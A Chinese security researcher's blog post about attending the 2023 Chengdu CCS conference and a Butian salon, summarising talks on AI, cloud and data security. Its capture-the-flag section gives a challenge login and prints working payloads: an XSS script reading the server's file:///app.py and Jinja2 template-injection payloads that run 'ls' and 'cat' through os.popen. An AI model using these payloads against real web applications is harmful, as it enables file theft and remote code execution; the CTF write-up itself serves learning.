2023成都CCS大会&&补天城市沙龙有感

2023成都CCS大会&&补天城市沙龙有感

AabyssZG
2023-09-01 / 1 评论 / 3,875 阅读 / 正在检测是否收录...
温馨提示:
本文最后更新于2023年12月24日,已超过148天没有更新,若内容或图片失效,请留言反馈。

前言

今年很巧,8月23日项目结束后,24号2023成都CCS网络安全大会就召开了。我今年刚好在武汉做项目,想了想,结束直接一个飞机飞往成都,开启了本次成都安全之旅。成都的师傅们都很热情,也结识了不少新的朋友,参加了成都CCS大会以及补天城市沙龙,感觉收获颇多,故写本文记录一下。

由于参加项目和大会的缘故,博客已经一个半月还未更新了,直到今日才有闲暇之时来落笔本文,各位师傅见谅哈哈。

补天城市沙龙合照:

补天大会合影.png

在补天城市沙龙上,有幸和网络尖刀安全团队的创始人曲子龙师傅(右四)重磅面基,在交流中学习到了很多东西

CCS网络安全大会合影:

CCS安全大会合影.png

由衷感谢无糖信息的HZEX师傅,给了我很多礼物哈哈~

注明:本文图片比较多,可以往下拉跳过图片,看一下我个人的总结

议程介绍

因为先去的是成都CCS网络安全大会,我们就先看成都CCS网络安全大会的议程

8月24日下午

本来8月24号早上有开幕式,但飞机到的比较晚,就参加了下午的「AI大模型安全论坛」

近两年,大模型、AI、人工智能、大数据等关键词,逐渐走入大众的视野之中。以ChatGPT为首的一众产品,迅速火遍国内外。当然,对于大模型的风险、安全问题以及应对手法也在网络安全圈子里被着重讨论。

ChatGPT大语言模型的到来,其实是改变了人类原有的获取知识的途径。从原本使用搜索引擎搜索-打开相关网页-参考多个来源的网页-归纳答案,到最后使用大语言模型查询问题-得到归纳好的结果。大大提升了知识的获取效率,从而间接的大大提升了工作效率。

但大模型并不是安全的,如上图所示,它也能被投毒,也能被恶意利用。之所以为什么现在还没有受到影响,是因为相关的模型还没有应用到实际的生产生活当中去,根据大会演讲嘉宾的预测,在2024年针对大模型的安全攻击将对生产系统产生实际危害。

有些师傅会问我是怎么看待人工智能、大数据等领域的,可以看我之前写的一篇文章: 2023西湖论剑·数字安全大会有感

8月25日上午

8月25日上午,主要看的就是「云安全与通信安全论坛」

有些师傅可能知道,今年我应TeamsSix(著名云渗透利用工具CF开发者)师傅的邀请,加入了 国际云安全联盟(CSA) 渗透测试工作组。在未来的时间,我也会将大量的精力放到云安全领域。

对于云安全,其实我想说的是云安全远远没有我们看到的那么简单,深入学习云安全之后,会发现云安全里面涉及的内容很多很多。同时云上环境和云下环境有着云泥之别,做云上渗透和云下渗透的姿势截然不同。

这部分的内容,我的博客后续也会相应跟进和更新。

8月25日下午

8月25日上午,主要看的就是「数据安全与数据治理论坛」

下午其实都是安全治理之类的,感兴趣看看~

8月26日上午

8月26日上午,主要看的就是「Web3与安全态势感知论坛」和「开发安全与人才培养论坛」

Web3和区块链安全,也是未来的一个趋势。但目前该区块的政策指向性并不明朗,可以先入手学习,但要看后面几年国内具体的情况,你应该懂我的意思。

对于最后钟麒嘉宾讲的《Redteam内网横向移动与流量对抗》,对我来说其实印象深刻。也对内网相关的横向移动和流量对抗有了新的思路和理解,可能后续博客的一些更新内容会来深入研究这部分的内容。

RPC( Remote Procedure Call),远程过程调用,相比于IPC来说RPC就是基于远程的工作机制,说白了RPC也是一种进程间通信方式,它只不过可以允许本地程序调用另一个地址空间的过程或者函数,而不用程序员去管理调用的细节。对于IPC来说,程序只能调用本地空间的函数,而RPC机制提供了一种程序员不必显示的区分本地调用和远程调用。

8月27日-补天城市沙龙

当当当,接下来来到补天城市沙龙环节~

由于当时我和我徒弟ThumpBo在酒店做渗透项目,去的比较晚,而且那边成都沙龙人好多好多~就没有拍议题照片了哈哈~

成都沙龙大合影.jpg

(找到哪个是我了吗?)

最让我印象深刻的是“补天白帽之夜”的快闪CTF这个环节,共有两道CTF题

快闪CTF-第一题

第一道是登录+文件上传CTF,截图如下:

快闪CTF-1.png

登录这边给提示了,账号是系统常用账号,密码是和补天沙龙有关的
然后我们愣是没猜出来,也可能是太紧张了哈哈~账号密码如下:

sysadmin  Butian@0827

登录后,截图如下:

快闪CTF-2.png

通过创建空白PHP文件并逐步写入内容从而造成任意文件上传,具体可以参考奇安信攻防社区的这篇文章: 记某系统有趣的文件上传

这道题坐在我旁边的谢队(Nyr4ki)师傅比我手速更快,成功拿下一血哈哈~

解题过程.jpg

快闪CTF-第二题

第二题是从XSS到任意文件读取到RCE,截图如下:

快闪CTF-3.png

说实话,这种题目我是第一次见过,再者Python Falsk的Web框架也是第一次碰到,没有啥经验,就智能看着别的大佬秀了~

这道题,可以参考奇安信攻防社区的这篇文章: 记一次从xss到任意文件读取

任意文件读取的Payload:

<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open('GET','file:///app.py');
x.send();
</script>

Education 那个栏目,输入以上Payload就可以看到 /app.py 就Web服务的源码

通过分析拿到的源码,可以构造以下Payload进行RCE:

<iframe src='http://127.0.0.1:54425/7c4a8d09ca3762af61e59520943dc26494f8941b?payload={{config|attr("__class__")|attr("__init__")|attr("__globals__")|attr("__getitem__")("os")|attr("popen")("ls")|attr("read")()}}' width="800" height="800">

执行 ls 命令,可以看到有个文件夹:

快闪CTF-4.jpg

然后再执行 cat 命令读取文件夹下的 flag 文件,即可拿到Flag:

<iframe src='http://127.0.0.1:54425/7c4a8d09ca3762af61e59520943dc26494f8941b?payload={{config|attr("__class__")|attr("__init__")|attr("__globals__")|attr("__getitem__")("os")|attr("popen")("cat /there_is_no_flag_really/flag")|attr("read")()}}' width="800" height="800">

本来这两道题目,我都拿到源代码细细研究,准备发一篇文章细细讲讲的
但问了一下出题的杨晨师傅(同时也是沙龙议题的演讲者),师傅说最好不要公开,索性作罢哈哈~希望你能从我给出的内容中学习到新知识~

后续我和谢队(Nyr4ki)师傅研究这两题研究了好久,还被补天的小姐姐拍下来发到公众号上面去了哈哈:

公众号点赞.jpg

重磅面基

同时,在此次补天城市沙龙上,有幸和网络尖刀安全团队的创始人曲子龙师傅重磅面基

在和大佬的交流中,其实不难看出几点内容:

  • Java和Go的学习非常有必要,Python需要向Go进行发展(也不是说Python不重要),主要是Python对于我们行业的需求来说,还有不少弊病
  • 目前整体安全行业的态势并不是很好,需要从新赛道寻求突破口
  • 人才需求是还在那的,但需要高端的人才需求,技术实力非常重要

    还有一个就是,大佬在四川重庆需要有大数据及大数据分析的人才,感兴趣的可以联系曲子龙师傅或者我,哈哈~

很可惜没有和大佬合个影哈哈~

总结

其实参加这种安全大会,我们作为网络安全工作者,主要是有以下目的:

  • 看最新的政策走向,看最新的网络安全行业趋势,并根据结果做好未来的职业规划或战略转变(如果你是企业家的话)
  • 看最新的技术成果,看各家的压轴项目和技术输出做的怎么样,从中得以管中窥豹,得出这个分支行业走到怎么样的阶段了
  • 学习前沿的网络安全框架、架构以及思维,从优越的分享者身上学习他们的技巧

本次成都之旅收获颇丰,也有许多精华和内容等待我的整理。后续会持续在我的个人博客上持续产出技术内容,感谢各位师傅的关注和支持~
同时也非常感谢成都的师傅们,非常热情哈哈~不枉此行,有缘再见!

37

评论 (1)

取消
  1. 头像
    rpvvn
    Windows 10 · Google Chrome

    画图

    回复